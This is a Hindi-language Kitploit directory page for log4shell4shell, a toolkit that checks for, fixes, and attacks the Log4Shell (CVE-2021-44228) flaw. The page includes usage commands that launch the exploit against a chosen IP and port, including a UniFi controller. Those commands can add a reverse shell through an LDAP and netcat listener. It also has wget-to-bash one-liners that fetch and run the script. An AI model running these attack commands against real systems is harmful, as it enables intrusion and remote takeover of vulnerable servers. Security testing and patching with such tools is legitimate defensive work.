Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4shell4shell — Log4shell - मल्टी-टूलकिट। संभावित CVE-2021-44228 कमजोरियों को खोजें, ठीक करें और परीक्षण करें - शेल पर एक संपूर्ण LOG4SHELL परीक्षण/हमला वातावरण प्रदान करता है | Kitploit
उपकरण/GitHubGitHub/suuhm/log4shell4shell
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - मल्टी-टूलकिट। संभावित CVE-2021-44228 कमजोरियों को खोजें, ठीक करें और परीक्षण करें - शेल पर एक संपूर्ण LOG4SHELL परीक्षण/हमला वातावरण प्रदान करता है

रिपॉजिटरी देखें
5104 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4shell4shell

Log4j - मल्टीटूल। संभावित CVE-2021-44228 कमजोरियों को खोजें और ठीक करें - एक संपूर्ण LOG4SHELL परीक्षण/आक्रमण वातावरण प्रदान करता है

Thumb

विशेषताएँ

  • अपने Linux/Mac/BSD और Windows सिस्टम में CVE-2021-44228 कमजोरियों की जाँच करें
  • log4j java class को हटाकर या कुछ environment variables सेट करके अपने सिस्टम को ठीक करें
  • Proof of Concept: आप स्वयं exploit का परीक्षण करने के लिए एक dummy spring boot server चला सकते हैं (https://github.com/christophetd/log4shell-vulnerable-app)
  • आप किसी वांछित IP-Port के विरुद्ध आक्रमण चला सकते हैं और एक Base64 Command / या एक साधारण Reverse Shell शामिल कर सकते हैं
  • https://github.com/fullhunt/log4j-scan द्वारा पूर्ण ip-range स्कैनिंग

Linux/Mac/BSD पर कैसे चलाएँ:

आवश्यकताएँ:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

इस oneliner से अपने सिस्टम की त्वरित जाँच करें:

wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

अधिक विकल्प

एक नमूना आक्रमण चलाएँ: IP: 10.4.4.20 पोर्ट 8080 लॉगिन पेज और अतिरिक्त रूप से एक Reverse Proxy Shell:

git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

screen -r l4s4s-ldap-srv और/या screen -r l4s4s-nc-rsh चलाकर Exploit-Server shell में कुछ आक्रमण जानकारी देखें:

पूर्ण स्कैन चलाएँ: IP: 10.4.4.20 पोर्ट 8080 और अतिरिक्त रूप से सभी परीक्षण आज़माएँ:

./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

Tomcat Springboot Server पर Proof of Concept चलाएँ:

./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

Unifi-Controller Exploit Attack/Check चलाएँ (10.4.4.20:8443 पर):

./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

सभी उपलब्ध विकल्प

_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm

Wrong input! Please enter one of these options:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

अपने linux और/या macos python संस्करण को कैसे अपग्रेड करें:

बस मेरी helper-script (--list-versions) चलाएँ: ./python-upgrader.sh

Windows x86 / x64 पर कैसे चलाएँ:

बस Powershell (admin-mode) में चलाएँ: .\set_windows_fix.ps1

यह स्क्रिप्ट alpha है! इसलिए यदि आपको कोई समस्या आए तो कृपया मुझे बताएं

कानूनी अस्वीकरण

यह प्रोजेक्ट log4shell4shell केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व आपसी सहमति के बिना लक्ष्यों पर आक्रमण करने के लिए log4j-scan का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई दायित्व नहीं मानते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

टूल डाउनलोड करें